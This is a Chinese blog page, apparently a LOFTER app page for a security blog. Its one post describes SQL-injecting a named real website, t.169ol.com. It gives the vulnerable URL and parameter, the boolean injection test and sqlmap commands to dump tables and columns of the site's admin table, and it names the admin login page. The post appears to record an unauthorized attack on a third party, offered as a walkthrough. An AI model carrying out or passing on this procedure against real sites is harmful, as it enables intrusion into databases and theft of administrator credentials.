LOFTER for ipad —— 让兴趣,更有趣

点击下载 关闭

0y's Blog - 致力关注于网络 | 网络信息安全

hkcrackerj0e.lofter.com|个人应用 for Android

网络安全 web漏洞测试 工具 系统漏洞 灭狗剂 国家安全 Anonymous web攻防 系统安全 一句话木马 oday 网络金雕 版本通杀 脚本 菲律宾黑客

共32篇文章,30人喜欢

应用截图

0y's Blog - 致力关注于网络 | 网络信息安全

0y's Blog - 致力关注于网络 | 网络信息安全

 

· 检测169在线兑换

0x00  站点:http://t.169ol.com/

                注入点:http://119.6.119.51/index.php?act=exchange&op=exchange&vg_id=88

 

   看url  有注入  就判断 and 1=1返回正常

                                       and 1=2 返回错误

   存在注入   丢去sqlmap

0x01   

  先用sqlmap 看下注入点 

    sqlmap.py -u "url" 


0x02

    注入找表 

   sqlmap.py -u "url" --tables

   注入后找到了一个wm_admin的表  我们即将猜解他。

  

0x04

    猜字段

sqlmap.py -u "url" --columns -T "wm_admin" -D "womall"

 

0x05

   猜内容 



由于md5解不开 我也没法进去了= =  

后台:http://t.169ol.com/admin

0y's Blog - 致力关注于网络 | 网络信息安全

功能说明

1. 独立查看“0y's Blog - 致力关注于网络 | 网络信息安全”发布在LOFTER的所有文章
2. 文章更新通知提醒
3. 归档方式查看
4. 方便的分享文章到微信、微博

创建一个属于自己的APP

本应用由UAPP生成,内容版权归作者所有。UAPP支持LOFTER、网易博客、新浪博客、百度空间、QQ空间、blogbus、豆瓣日记、点点网、搜狐博客、网易摄影等生成个人应用。

了解更多